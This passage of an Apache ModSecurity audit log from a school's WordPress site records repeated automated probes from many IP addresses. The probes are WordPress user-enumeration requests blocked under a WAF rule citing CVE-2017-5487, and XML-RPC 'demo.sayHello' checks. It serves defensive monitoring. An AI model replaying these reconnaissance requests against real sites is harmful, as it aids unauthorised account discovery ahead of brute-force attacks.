"WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747451169083782 2832 (- - -) Stopwatch2: 1747451169083782 2832; combined=1240, p1=443, p2=767, p3=0, p4=0, p5=30, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7a9ea91e-Z-- --9862d13f-A-- [17/May/2025:10:06:19 +0700] aCf9KxKi5m5upc8uMd6jgQAAAMQ 103.236.140.4 50732 103.236.140.4 8181 --9862d13f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.248.87.182 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.87.182 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --9862d13f-C-- demo.sayHello --9862d13f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --9862d13f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747451179755491 6677 (- - -) Stopwatch2: 1747451179755491 6677; combined=4833, p1=606, p2=3986, p3=39, p4=42, p5=96, sr=81, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9862d13f-Z-- --8275012e-A-- [17/May/2025:10:08:41 +0700] aCf9uem4kjNN-hEbWjJDHwAAAEQ 103.236.140.4 50746 103.236.140.4 8181 --8275012e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 45.201.11.193 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.201.11.193 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --8275012e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8275012e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747451321977868 2928 (- - -) Stopwatch2: 1747451321977868 2928; combined=1332, p1=465, p2=837, p3=0, p4=0, p5=30, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8275012e-Z-- --ca080278-A-- [17/May/2025:10:08:48 +0700] aCf9wHyxdQCiyU1ENFcrhAAAAAc 103.236.140.4 50750 103.236.140.4 8181 --ca080278-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 45.201.11.193 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.201.11.193 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --ca080278-C-- demo.sayHello --ca080278-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --ca080278-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747451328391606 6558 (- - -) Stopwatch2: 1747451328391606 6558; combined=4682, p1=632, p2=3822, p3=45, p4=43, p5=85, sr=80, sw=55, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ca080278-Z-- --8932826e-A-- [17/May/2025:10:10:17 +0700] aCf-Gem4kjNN-hEbWjJDJQAAAE8 103.236.140.4 50768 103.236.140.4 8181 --8932826e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.108.135 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.108.135 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --8932826e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8932826e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747451417030366 3133 (- - -) Stopwatch2: 1747451417030366 3133; combined=1337, p1=429, p2=873, p3=0, p4=0, p5=35, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8932826e-Z-- --edf4e85d-A-- [17/May/2025:10:10:25 +0700] aCf-Iem4kjNN-hEbWjJDJwAAAFM 103.236.140.4 50772 103.236.140.4 8181 --edf4e85d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.108.135 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.108.135 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --edf4e85d-C-- demo.sayHello --edf4e85d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --edf4e85d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747451425815190 6524 (- - -) Stopwatch2: 1747451425815190 6524; combined=4690, p1=598, p2=3818, p3=40, p4=43, p5=126, sr=77, sw=65, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --edf4e85d-Z-- --a942172d-A-- [17/May/2025:10:10:36 +0700] aCf-LOm4kjNN-hEbWjJDKgAAAFg 103.236.140.4 50780 103.236.140.4 8181 --a942172d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 45.202.79.80 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.202.79.80 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --a942172d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a942172d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747451436687191 2261 (- - -) Stopwatch2: 1747451436687191 2261; combined=1100, p1=380, p2=691, p3=0, p4=0, p5=29, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a942172d-Z-- --fe9e897c-A-- [17/May/2025:10:10:42 +0700] aCf-Mum4kjNN-hEbWjJDKwAAAEM 103.236.140.4 50784 103.236.140.4 8181 --fe9e897c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 45.202.79.80 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.202.79.80 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --fe9e897c-C-- demo.sayHello --fe9e897c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --fe9e897c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747451442751113 5361 (- - -) Stopwatch2: 1747451442751113 5361; combined=4015, p1=525, p2=3272, p3=29, p4=31, p5=93, sr=74, sw=65, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fe9e897c-Z-- --471d3a4f-A-- [17/May/2025:10:13:26 +0700] aCf-1nyxdQCiyU1ENFcrhwAAAAs 103.236.140.4 50794 103.236.140.4 8181 --471d3a4f-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.61.110 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.61.110 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --471d3a4f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --471d3a4f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747451606277538 2965 (- - -) Stopwatch2: 1747451606277538 2965; combined=1278, p1=424, p2=819, p3=0, p4=0, p5=35, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --471d3a4f-Z-- --b0921709-A-- [17/May/2025:10:13:31 +0700] aCf-2-m4kjNN-hEbWjJDLwAAAEg 103.236.140.4 50798 103.236.140.4 8181 --b0921709-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.61.110 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.61.110 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --b0921709-C-- demo.sayHello --b0921709-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --b0921709-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747451611479498 5286 (- - -) Stopwatch2: 1747451611479498 5286; combined=4007, p1=491, p2=3233, p3=93, p4=32, p5=94, sr=73, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b0921709-Z-- --f7ec0304-A-- [17/May/2025:10:14:04 +0700] aCf-_Om4kjNN-hEbWjJDMQAAAEs 103.236.140.4 50802 103.236.140.4 8181 --f7ec0304-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.124.19 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.124.19 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --f7ec0304-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f7ec0304-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747451644793831 12666 (- - -) Stopwatch2: 1747451644793831 12666; combined=20884, p1=451, p2=769, p3=0, p4=0, p5=9846, sr=77, sw=1, l=0, gc=9817 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f7ec0304-Z-- --40604d7f-A-- [17/May/2025:10:14:11 +0700] aCf_A3yxdQCiyU1ENFcriAAAAAw 103.236.140.4 50806 103.236.140.4 8181 --40604d7f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.124.19 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.124.19 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --40604d7f-C-- demo.sayHello --40604d7f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --40604d7f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747451651785784 4816 (- - -) Stopwatch2: 1747451651785784 4816; combined=3783, p1=470, p2=3000, p3=24, p4=26, p5=145, sr=69, sw=118, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --40604d7f-Z-- --f32dbd59-A-- [17/May/2025:10:20:40 +0700] aCgAiOm4kjNN-hEbWjJDOwAAAEg 103.236.140.4 50840 103.236.140.4 8181 --f32dbd59-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.199.45 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.199.45 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --f32dbd59-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f32dbd59-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747452040746480 2875 (- - -) Stopwatch2: 1747452040746480 2875; combined=1274, p1=425, p2=820, p3=0, p4=0, p5=29, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f32dbd59-Z-- --7d603f48-A-- [17/May/2025:10:20:47 +0700] aCgAj-m4kjNN-hEbWjJDPQAAAEs 103.236.140.4 50844 103.236.140.4 8181 --7d603f48-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.199.45 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.199.45 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --7d603f48-C-- demo.sayHello --7d603f48-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --7d603f48-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747452047191660 4549 (- - -) Stopwatch2: 1747452047191660 4549; combined=3566, p1=430, p2=2939, p3=23, p4=23, p5=88, sr=67, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7d603f48-Z-- --f89ced7d-A-- [17/May/2025:10:22:32 +0700] aCgA-HyxdQCiyU1ENFcriwAAAA8 103.236.140.4 50870 103.236.140.4 8181 --f89ced7d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.92.188 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.92.188 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --f89ced7d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f89ced7d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747452152305438 2802 (- - -) Stopwatch2: 1747452152305438 2802; combined=1232, p1=428, p2=775, p3=0, p4=0, p5=29, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f89ced7d-Z-- --80fe460e-A-- [17/May/2025:10:22:37 +0700] aCgA_RKi5m5upc8uMd6jhQAAAMo 103.236.140.4 50874 103.236.140.4 8181 --80fe460e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.92.188 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.92.188 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --80fe460e-C-- demo.sayHello --80fe460e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --80fe460e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747452157944879 4782 (- - -) Stopwatch2: 1747452157944879 4782; combined=3666, p1=472, p2=2996, p3=23, p4=25, p5=89, sr=69, sw=61, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --80fe460e-Z-- --27386442-A-- [17/May/2025:10:25:50 +0700] aCgBvhKi5m5upc8uMd6jhgAAAMs 103.236.140.4 50892 103.236.140.4 8181 --27386442-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.175.131 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.175.131 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --27386442-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --27386442-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747452350700890 2862 (- - -) Stopwatch2: 1747452350700890 2862; combined=1255, p1=449, p2=776, p3=0, p4=0, p5=30, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --27386442-Z-- --7ca5477d-A-- [17/May/2025:10:25:56 +0700] aCgBxOm4kjNN-hEbWjJDTAAAAFE 103.236.140.4 50896 103.236.140.4 8181 --7ca5477d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.175.131 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.175.131 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --7ca5477d-C-- demo.sayHello --7ca5477d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --7ca5477d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" 